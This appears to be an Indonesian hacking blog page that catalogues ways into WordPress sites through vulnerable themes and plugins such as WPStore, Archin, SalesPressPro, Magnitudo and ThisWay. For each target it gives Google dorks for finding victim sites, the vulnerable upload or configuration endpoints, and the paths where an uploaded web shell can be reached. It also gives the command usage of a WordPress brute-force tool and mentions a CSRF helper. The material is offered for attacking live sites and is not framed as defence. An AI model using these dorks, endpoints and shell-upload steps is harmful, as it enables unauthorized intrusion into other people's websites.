WPStore WordPress Theme ( Uploader )
Google Dork : /wp-content/themes/WPStore/
Infected File : /upload/index.php
Shell Access : /wp-content/uploads/products_img/[shell].php
Archin WordPress Theme Unauthenticated Configuration Access Vulnerability
Archin WordPress Theme Unauthenticated Configuration Access Vulnerability
Google Dork : /wp-content/themes/archin/
Exploit : /hades_framework/option_panel/ajax.php
Change, site target and email
Python 2.7, save as archin.py in folder C:\Python27\
Google Dork : /wp-content/themes/archin/
Exploit : /hades_framework/option_panel/ajax.php
Change, site target and email
Python 2.7, save as archin.py in folder C:\Python27\
WPBrute Force
Wordpress Brute Force
Download - WPBrute - Force
C:\Users\Phal3> Cd C:\WPbrute
C:\WPBrute>wpbforce.exe
Usage : WPBforce.exe -url=http://www.site.com -user=admin -pass=wordlist.txt -threads=10
Download - WPBrute - Force
C:\Users\Phal3> Cd C:\WPbrute
C:\WPBrute>wpbforce.exe
Usage : WPBforce.exe -url=http://www.site.com -user=admin -pass=wordlist.txt -threads=10
Themes SalesPressPro ( Uploader )
Themes SalesPressPro ( Uploader )
Google Dork : /wp-content/themes/salespresspro/
Infected File : /wp-content/themes/salespresspro/headerimg-upload.php - /headerimgbgblog-upload.php
Shell Access : Open Image in New Tab
Google Dork : /wp-content/themes/salespresspro/
Infected File : /wp-content/themes/salespresspro/headerimg-upload.php - /headerimgbgblog-upload.php
Shell Access : Open Image in New Tab
Plugins Wp_Optin_Pro ( Uploader )
Plugins Wp_Optin_Pro ( Uploader )
Google Dork : /wp-content/plugins/wp_optin_pro/
Infected File : media-upload.php and videofake-upload.php
Shell Access : Open Image in New Tab
Google Dork : /wp-content/plugins/wp_optin_pro/
Infected File : media-upload.php and videofake-upload.php
Shell Access : Open Image in New Tab
WordPress Magnitudo Themes Arbitary
"WordPress Magnitudo Themes Arbitary"
Google Dork : /wp-content/themes/magnitudo/
Exploit : /framework/_scripts/valums_uploader/php.php
Shell Access : http://localhost/wp-content/uploads/[years]/[month] ( sesuai path )
Google Dork : /wp-content/themes/magnitudo/
Exploit : /framework/_scripts/valums_uploader/php.php
Shell Access : http://localhost/wp-content/uploads/[years]/[month] ( sesuai path )
CSRF - Helper ( Php )
.png)
Upload File php, ke-Hosting atau Localhost. . .
Coded by Latunusa | No Name Cyber Team . . .
Theme Wordpress Vuln Unauthenticated Configuration Access Vulnerability
Thema Vuln Unauthenticated Configuration Access Vulnerability
Text file - Tema Vuln Unauthenticated Configuration Access Vulnerability
ThisWay Theme Shell Upload
"ThisWay Theme Shell Upload"
Google Dork : /wp-content/themes/ThisWay/
Vulnerabillity : http://127.0.0.1/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php
Shell Access : http://127.0.0.1/wp-content/uploads/[Years]/[month]/shell.php
Google Dork : /wp-content/themes/ThisWay/
Vulnerabillity : http://127.0.0.1/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php
Shell Access : http://127.0.0.1/wp-content/uploads/[Years]/[month]/shell.php
Langganan:
Komentar (Atom)